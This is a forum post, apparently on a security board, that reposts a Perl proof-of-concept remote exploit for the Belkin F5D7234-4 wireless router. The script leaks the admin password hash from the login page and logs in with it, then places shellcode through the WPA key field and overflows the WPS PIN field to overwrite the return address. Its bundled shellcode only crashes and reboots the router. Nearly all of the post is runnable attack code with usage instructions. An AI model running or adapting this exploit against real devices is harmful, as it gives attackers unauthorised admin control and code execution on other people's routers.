Jump to content
Matt

Belkin G Wireless Router Code Execution

By Matt, in Exploituri

Recommended Posts

Matt Newbie

Matt

Posted
Posted

Description :

Belkin G Wireless Router remote code execution proof of concept exploit.

Author : Aodrulez

Source : Belkin G Wireless Router Code Execution ? Packet Storm

Code : 

+-----------------------------------+
| Belkin G Wireless Router RCE PoC. |
+-----------------------------------+



Firmware Version : 5.00.12 (Sep 10 2009 19:54:12)
Boot Version     : 1.18
Hardware         : F5D7234-4 v5 (01)
Author           : Aodrulez.
Email            : atul.alex@orchidseven.com
Twitter          : http://twitter.com/Aodrulez


+---------+
| Details |
+---------+

The exploit works in 3 stages.
1. Authentication.
2. Setting up shellcode in the memory at a known location.
3. Triggering an RA register over-write to execute the shellcode.

This particular model of router is based on 'embedded Configurable operating system' a.k.a (eCos) version 2.0. The shellcode used in the exploit is a dummy one that basically just triggers an exception & crashes the router, forcing it to reboot.


Video Demo :
http://www.youtube.com/watch?v=MtrYs-f6X3E


+---------+
| Exploit |
+---------+

#!/usr/bin/perl

use strict;
use warnings;
use LWP 5.64;
$| = 1;

# Variable declarations.
my $browser = LWP::UserAgent->new;
my $passHash="";
my $url ="";
my $response ="";
my $ip="";
$browser ->timeout(10);


# Just a few nops followed by a dummy shellcode that crashes & reboots the router.
my $shellcode="\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x04\xd0\xff\xff\x20\x20\x20\x20";



sub Authenticate()
{
  print "[+] Trying to authenticate.\n";
  $url= "http://$ip/login.stm";
  $response = $browser->get( $url);
  my @aod= $response->content =~ m/var password = "(.*)";/g;
  if(!$aod[0])
  {
   print "[-] Damn! Something went wrong. This might not work here \n";
   exit;
  }
  else
  {
   $passHash=$aod[0];
   print "[+] Admin Password = $passHash (MD5 Hash).\n";
  }

 print "[+] Time to authenticate you!\n";
 $url = "http://$ip/cgi-bin/login.exe";
 $response = $browser->post( $url,
    [ 'totalMSec' => "1377121454.99",  
      'pws' => "$passHash",
    ,]
  );

  if( $response->content =~ /index/ ) 
  {
    print "[+] Logged in successfully as 'Admin'!\n";
    print "[!] Open this link in a browser for admin access : http://$ip/setup.htm \n";
  } else {
    print "[-] Login failed! This might not work here \n";
    exit;
  }

  print "\n[+] Continue with exploitation? (Y/N) : ";
  my $temp=<STDIN>;
  if ($temp=~"Y" || $temp=~"y")
  {
    Exploit();
  }
  else
  {
    print "[+] Have fun!\n\n";
    exit;
  }
}


sub Exploit()
{
# Stage 1: Fill shellcode at a known location : 0x803c0278 (Buffer=120 bytes)
# 0x803c0278 is fixed for this device/firmware combination.
  print "[+] Stage 1 : Allocating shellcode.\n";

  if (length($shellcode) > 120)
  {
   print "[-] Shellcode is too big! (120 bytes Max)\n";
   exit;
  }
  print "[+] Shellcode length : ".length($shellcode)."\n";

  # Fill the rest with nops. Not needed but good to have.
  # Shellcode size should be ideally a multiple of 4 as this is MIPS.
  my $nopsize=120-length($shellcode);
  $shellcode=$shellcode.("\x20"x$nopsize);

 $url = "http://$ip/cgi-bin/wireless_WPA.exe";
 $response = $browser->post( $url,
    [ 'wpa_authen' => "1",  
      'wpa_psk' => '0',
      's_rekeysec' => '900000',
      's_rekeypkt' => '1000',
      'w802_rekey' => '0',
      'encryption' => '3',
      'security_type' => '4',
      'authentication' => '3',
      'encryption_hid' => '3',
      'wpa_key_text' => "ssss",
      'wpa_key_pass' => "$shellcode",
      'obscure_psk' => '1',
      'sharedkey_alter' => '',
      'sharedkey_alter1' => '1',

    ,]
  );

  if( !$response->content ) 
  {
     print "[-] Damn! Something went wrong. This might not work here \n";  
  }
  else 
  {   
    print "[+] Stage 1 seems to have gone well.\n";
  }

# Stage 2: Trigger Stack Overflow & overwrite RA
print "[+] Stage 2 : Triggering Return Address overwrite.\n";

my $junk="A"x32;
my $s0="BBBB";
my $s1="CCCC";
my $ra="\x78\x02\x3c\x80"; #EPC   -> 0x803c0278 Fixed for this device/firmware combination.
my $nop="\x20\x20\x20\x20";
my $payload=$junk.$s0.$s1.$ra.$nop;

 $url = "http://$ip/cgi-bin/wireless_WPS_Enroll.exe";
 $response = $browser->post( $url,[ 'pin' => "$payload"]);
 if( !$response->content ) 
  {
    print "[-] Damn! Something went wrong. This might not work here \n";  
  } 
 else 
 {
    print "[-] Done! \\m/\n";
 }

}

sub Welcome()
{
  print "\n\n+------------------------------------------+\n";
  print "|  Belkin G Wireless Router Remote Exploit |\n";
  print "|     (Authentication bypass & RCE PoC)    |\n";
  print "+------------------------------------------+\n";
  print "[+] By Aodrulez.\n";
  print "\n[+] Usage   : perl $0 router_ip";
  print "\n[!] Example : perl $0 192.168.2.1";

  if (!$ARGV[0])
  {
    print "\n[-] (o_0) Seriously??\n";
    exit;
  }

  $ip=$ARGV[0];
  print "\n[+] Target IP : $ip\n";

}

# Burn!!
Welcome();
Authenticate();
# End of exploit code.



+-------------------+
| Greetz Fly Out To |
+-------------------+


1] Amforked()          : My Mentor.
2] The Blue Genius     : My Boss.
3] str0ke (milw0rm)
4] www.orchidseven.com
5] www.malcon.org
6] www.nsd.org.in


+-------+
| Quote |
+-------+

“I would rather die of passion than of boredom.” - Vincent van Gogh.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...